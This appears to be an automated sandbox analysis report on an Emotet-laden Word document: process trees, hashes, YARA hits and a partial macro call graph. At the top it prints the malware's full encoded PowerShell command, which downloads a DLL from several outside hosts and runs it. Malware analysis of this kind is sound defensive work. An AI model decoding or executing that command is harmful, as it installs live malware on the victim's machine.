                                                                      Commandline:powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAKQArACcAaAAnACsAJwBzACcAKwAoACcAOgAnACsAJwAvAC8AbgAnACkAKwAoACcAbwByAGEAaQBsACcAKwAnAHkAJwApACsAJwBhACcAKwAoACcALgAnACsAJwBjAG8AJwArACcAbQAvAGQAcgAnACkAKwAnAHUAcAAnACsAKAAnAGEAbAAnACsAJwAvACcAKQArACgAJwByACcAKwAnAGUAdABBACcAKQArACcAbAAnACsAKAAnAC8AJwArACcAQABzAGcAJwApACsAJwAgAHkAJwArACgAJwB3ACAAYQBoAHMAOgAnACsAJwAvACcAKQArACcALwAnACsAKAAnAGgAYgBwAHIAaQB2AGkAJwArACcAbAAnACsAJwBlACcAKwAnAGcAJwApACsAJwBlACcAKwAnAGQALgAnACsAJwBjAG8AJwArACgAJwBtAC8AYwBnACcAKwAnAGkALQBiAGkAbgAnACsAJwAvAFEAZwAnACkAKwAoACcALwBAAHMAJwArACcAZwAgAHkAJwArACcAdwAnACkAKwAoACcAIAAnACsAJwBhAGgAcwAnACkAKwAnADoAJwArACcALwAvACcAKwAnAHUAJwArACcAbQBtACcAKwAoACcAYQBoAHMAdABhAHIAJwArACcAcwAuACcAKwAnAGMAbwBtACcAKQArACcALwAnACsAKAAnAGEAcAAnACsAJwBwAF8AJwApACsAJwBvACcAKwAoACcAbABkAF8AJwArACcAbQAnACkAKwAoACcAYQB5AF8AJwArACcAMgAnACkAKwAnADAAJwArACgAJwAxADgAJwArACcALwAnACkAKwAoACcAYQBzACcAKwAnAHMAZQB0AHMAJwApACsAKAAnAC8AJwArACcAdwBEAEwAOAAnACsAJwB4ACcAKQArACcALwAnACsAKAAnAEAAcwAnACsAJwBnACAAJwApACsAKAAnAHkAJwArACcAdwAgACcAKQArACgAJwBhAGgAJwArACcAcwAnACkAKwAnADoAJwArACgAJwAvAC8AdwB3AHcAJwArACcALgAnACkAKwAnAHQAJwArACcAZQBlACcAKwAoACcAbABlAGsAZAAnACsAJwBlAGQAJwArACcALgBjAG8AbQAvACcAKQArACgAJwBjAGcAJwArACcAaQAtAGIAaQAnACsAJwBuACcAKQArACcALwAnACsAKAAnAEwAUAAnACsAJwBvAC8AJwApACkALgAiAFIAYABlAHAAYABsAEEAYwBFACIAKAAoACcAcwAnACsAKAAnAGcAJwArACcAIAB5AHcAIAAnACsAJwBhACcAKQArACcAaAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACcAZAAnACsAKAAnAHMAZQAnACsAJwB3AGYAJwApACkALAAoACcAdwAnACsAKAAnAGUAJwArACcAdgB3AGUAJwApACkAKQAsACgAJwBhACcAKwAoACcAZQBmACcAKwAnAGYAJwApACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACkAWwAyAF0AKQAuACIAcwBQAGAAbABpAFQAIgAoACQAVAA5ADIAVgAgACsAIAAkAFgAagBiADYAdQB1ADkAIAArACAAJABVADUAXwBXACkAOwAkAEYAMQA4AEgAPQAoACcAWQAnACsAKAAnADEANwAnACsAJwBYACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABIADIAMAA5AG0AMwA0ACAAaQBuACAAJABPAHoAeAA5AHgAawBkACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAJwArACcAagBlAGMAdAAnACkAIABzAFkAUwB0AEUATQAuAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAFQAKQAuACIARABvAHcAYABOAEwATwBBAEQAYABGAEkAYABsAEUAIgAoACQASAAyADAAOQBtADMANAAsACAAJABJAHEANgByAGYAZwAwACkAOwAkAFYAMwAyAEUAPQAoACgAJwBYACcAKwAnADcAMQAnACkAKwAnAEcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAEkAcQA2AHIAZgBnADAAKQAuACIATABlAE4AYABnAHQASAAiACAALQBnAGUAIAAzADQAMgA1ADgAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZABsAGwAMwAnACsAJwAyACcAKQAgACQASQBxADYAcgBmAGcAMAAsACgAJwBTAGgAJwArACgAJwBvAHcARAAnACsAJwBpACcAKQArACcAYQAnACsAKAAnAGwAbwBnACcAKwAnAEEAJwApACkALgAiAHQAYABPAFMAVABgAFIAaQBOAEcAIgAoACkAOwAkAFAAOAA5AEcAPQAoACcAUwA4ACcAKwAnADEAVAAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMgAwAEcAPQAoACcAQgAnACsAKAAnADEAJwArACcAMgBHACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABTADMAMwBaAD0AKAAnAFEAJwArACgAJwBfADUAJwArACcAQQAnACkAKQA=
                                                                      Imagebase:0x13fec0000
                                                                      File size:473600 bytes
                                                                      MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 2364 Parent PID: 2552

                                                                      General

                                                                      Start time:12:17:47
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                                                                      Imagebase:0xff9b0000
                                                                      File size:45568 bytes
                                                                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 2360 Parent PID: 2364

                                                                      General

                                                                      Start time:12:17:48
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2113528268.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2113590423.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 2460 Parent PID: 2360

                                                                      General

                                                                      Start time:12:17:52
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2127750584.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2124233296.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2124067211.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 2484 Parent PID: 2460

                                                                      General

                                                                      Start time:12:17:58
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2133960367.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2134645958.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2134026009.0000000000260000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 2404 Parent PID: 2484

                                                                      General

                                                                      Start time:12:18:02
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2148272205.00000000006A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2149995465.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 3032 Parent PID: 2404

                                                                      General

                                                                      Start time:12:18:09
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2157336224.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2157365734.00000000002C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2159945715.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 3064 Parent PID: 3032

                                                                      General

                                                                      Start time:12:18:13
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2168489304.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2170332868.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2168457347.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 1616 Parent PID: 3064

                                                                      General

                                                                      Start time:12:18:18
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2180397123.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2177327005.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2177340948.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 2244 Parent PID: 1616

                                                                      General

                                                                      Start time:12:18:22
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2188156936.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2188168029.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 2380 Parent PID: 2244

                                                                      General

                                                                      Start time:12:18:27
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2197905867.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2198949244.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2197927518.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 2372 Parent PID: 2380

                                                                      General

                                                                      Start time:12:18:32
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2210754308.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2208025145.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2208036737.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 2564 Parent PID: 2372

                                                                      General

                                                                      Start time:12:18:37
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2217818929.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2217846238.0000000000240000.00000040.00000001.sdmp, Author: Joe Security

                                                                      Chronological Activities

                                                                      Analysis Process: rundll32.exe PID: 1336 Parent PID: 2564

                                                                      General

                                                                      Start time:12:18:41
                                                                      Start date:27/01/2021
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1
                                                                      Imagebase:0x900000
                                                                      File size:44544 bytes
                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2336963149.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security

                                                                      Chronological Activities

                                                                      Disassembly

                                                                      Code Analysis

                                                                      VBA Code

                                                                      Call Graph

                                                                      Graph

                                                                      Module: Bcur5699z4d

                                                                      Declaration
                                                                      LineContent
                                                                      1

                                                                      Attribute VB_Name = "Bcur5699z4d"

                                                                      2

                                                                      Attribute VB_Base = "1Normal.ThisDocument"

                                                                      3

                                                                      Attribute VB_GlobalNameSpace = False

                                                                      4

                                                                      Attribute VB_Creatable = False

                                                                      5

                                                                      Attribute VB_PredeclaredId = True

                                                                      6

                                                                      Attribute VB_Exposed = True

                                                                      7

                                                                      Attribute VB_TemplateDerived = True

                                                                      8

                                                                      Attribute VB_Customizable = True

                                                                      Executed Functions
                                                                      Subroutine Document_open, APIs: 156, Strings: 0, Number of lines: 3, Relevance: 235.503
                                                                      APIsMeta Information

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: O9eax2mx6bn5xuv

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Content

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Bud375u79tqnjtr8hp

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: bebkDqAH

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: EWTFmUdCA

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: ueWFHDCC

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: yigPu

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: wTLHBUFzI

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Replace

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: saw

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Styles

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: oSnKJGCv

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: NVFQOFAXs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Paragraphs

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: KoPDIC

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Left

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Len

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: InStr

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

                                                                      Part of subcall function Xqcxarraokjbi@Nst6otvnmgmpw: Range

